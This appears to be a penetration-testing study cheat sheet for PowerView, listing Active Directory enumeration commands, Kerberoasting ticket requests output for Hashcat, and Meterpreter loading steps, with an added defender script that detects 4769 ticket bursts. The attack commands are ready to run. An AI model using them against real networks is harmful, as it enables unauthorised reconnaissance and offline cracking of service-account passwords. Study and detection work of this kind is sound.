PowerView

PowerView is part of PowerSploit and is also bundled with the PowerShell Empire framework.

Officially allowed during the OSCP exam according to the OSCP Exam FAQ.

Location

Upload to the victim machine. See File Transfer.

/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

Enumeration

powershell
Import-Module .\PowerView.ps1

Domain

Domain name & Domain Controllers

Get-NetDomain

Domain SID

Get-DomainSID

Policy

Get-DomainPolicy

Domain controller

Get-NetDomainController -Domain <domain>

Computers

Get-NetComputer | select cn, samaccountname, samaccounttype, operatingsystem, serviceprincipalname | Format-Table -AutoSize | Out-String -Width 4096

Computers & OS

Get-NetComputer | select cn, samaccountname, operatingsystem

Computers & SPNs

Get-NetComputer | select cn, samaccountname, serviceprincipalname | Where-Object { $_.serviceprincipalname } | Out-String -Width 4096

Users & Sessions

Enumerate logged-in users – DO THIS FOR EVERY COMPUTER FOUND

Get-NetLoggedon uses NetWkstaUserEnum, which requires local administrator rights on the target computer.

Get-NetLoggedon | Format-Table
Get-NetLoggedon -ComputerName <computer name> | Format-Table

Retrieve active sessions on the domain controller – DO FOR FILE SERVERS AND DC

Get-NetSession uses NetSessionEnum, which can be run as a regular AD user.

Get-NetSession -ComputerName <DC computer name> | Format-Table

Users & groups

Very useful!

Get-NetUser | select samaccountname,objectsid,memberof | Out-String -Width 4096

Service Principal Names (SPN)

Very useful! Get a Kerberos ticket for Kerberoasting.

Get-DomainSPNTicket [-SPN] <String[]> [-OutputFormat <String>] [-Credential <PSCredential>]
Get-DomainSPNTicket [-User] <Object[]> [-OutputFormat <String>] [-Credential <PSCredential>]
Get-DomainSPNTicket -SPN "<SPN>"
Get-DomainSPNTicket -User "<Object ID of user>"

Request Kerberos service tickets for all users with non-null SPNs and output them in Hashcat format.

Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
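Added example, not part of PowerView or of the original page: the defender-side view of the command above. Requesting tickets for every SPN account shows up on the domain controller as a burst of Security event 4769 (Kerberos service ticket requested) from one account, typically with RC4 encryption (type 0x17). The thresholds, the sample events and the trimmed XML layout are assumptions.

```powershell
# Added detection example (assumed thresholds; constructed sample data).
# Parses 4769 event XML into objects and flags accounts that request RC4
# tickets for many distinct services within a short window.
function ConvertFrom-Event4769 {
    param([Parameter(ValueFromPipeline)][string]$EventXml)
    process {
        $x = [xml]$EventXml
        $d = @{}
        # Each <Data Name='...'> child carries one event field
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time      = [datetime]$x.Event.System.TimeCreated.SystemTime
            Requester = $d.TargetUserName
            Service   = $d.ServiceName
            EncType   = $d.TicketEncryptionType
            Source    = $d.IpAddress
        }
    }
}

function Find-KerberoastBurst {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinServices = 3,      # assumed threshold
        [int]$WindowMinutes = 5     # assumed threshold
    )
    # Ignore computer accounts (ServiceName ends with $) and the TGT service itself
    $Events |
      Where-Object { $_.EncType -eq '0x17' -and $_.Service -notlike '*$' -and $_.Service -ne 'krbtgt' } |
      Group-Object Requester |
      ForEach-Object {
        $g = $_.Group | Sort-Object Time
        $span = ($g[-1].Time - $g[0].Time).TotalMinutes
        $distinct = ($g.Service | Sort-Object -Unique).Count
        if ($distinct -ge $MinServices -and $span -le $WindowMinutes) {
            [pscustomobject]@{ Requester = $_.Name; Services = $distinct; Minutes = [math]::Round($span, 1); Source = $g[0].Source }
        }
      }
}

# Constructed sample: one user pulling four RC4 service tickets in three minutes
$sample = 1..4 | ForEach-Object {
    "<Event><System><TimeCreated SystemTime='2024-01-01T10:0${_}:00Z'/></System><EventData>" +
    "<Data Name='TargetUserName'>jdoe@CORP.LOCAL</Data><Data Name='ServiceName'>svc_app$_</Data>" +
    "<Data Name='TicketEncryptionType'>0x17</Data><Data Name='IpAddress'>::ffff:10.0.0.5</Data></EventData></Event>"
}
Find-KerberoastBurst -Events ($sample | ConvertFrom-Event4769) | Format-Table -AutoSize

# Live use on a DC:
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} |
#   ForEach-Object { $_.ToXml() } | ConvertFrom-Event4769 | Find-KerberoastBurst -Events $input
```

The 0x17 filter only catches requests that fall back to RC4; accounts restricted to AES (or domains where RC4 is disabled) produce 0x12 tickets, so widen the filter or alert on service-name breadth alone in such environments.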

Request Kerberos service ticket for a specific SPN

Not tested by me

Request-SPNTicket -SPN "<SPN>"

Groups

List groups

Get-DomainGroup | select samaccountname | Sort-Object -Property samaccountname
Get-NetGroup | select samaccountname | Sort-Object -Property samaccountname

Groups & Members

Get-NetGroup | select samaccountname,member | Where-Object { $_.member } | Out-String -Width 4096
Get-DomainGroupMember -Recurse -Identity "*" | select GroupName,MemberName,MemberSID | Out-String -Width 4096
Get-DomainGroupMember -Recurse -Identity "Domain Admins" | select GroupName,MemberName,MemberSID | Out-String -Width 4096

Shares

Find file servers. Many users tend to be logged in on this kind of server.

Get-NetFileServer

Search readable shares

Find-DomainShare -CheckShareAccess

Find interesting files on the shares; filters can be applied.

Find-InterestingDomainShareFile

PowerView within Metasploit

Within a Meterpreter session

load powershell
powershell_import /root/Desktop/PowerView.ps1
powershell_execute Get-NetDomain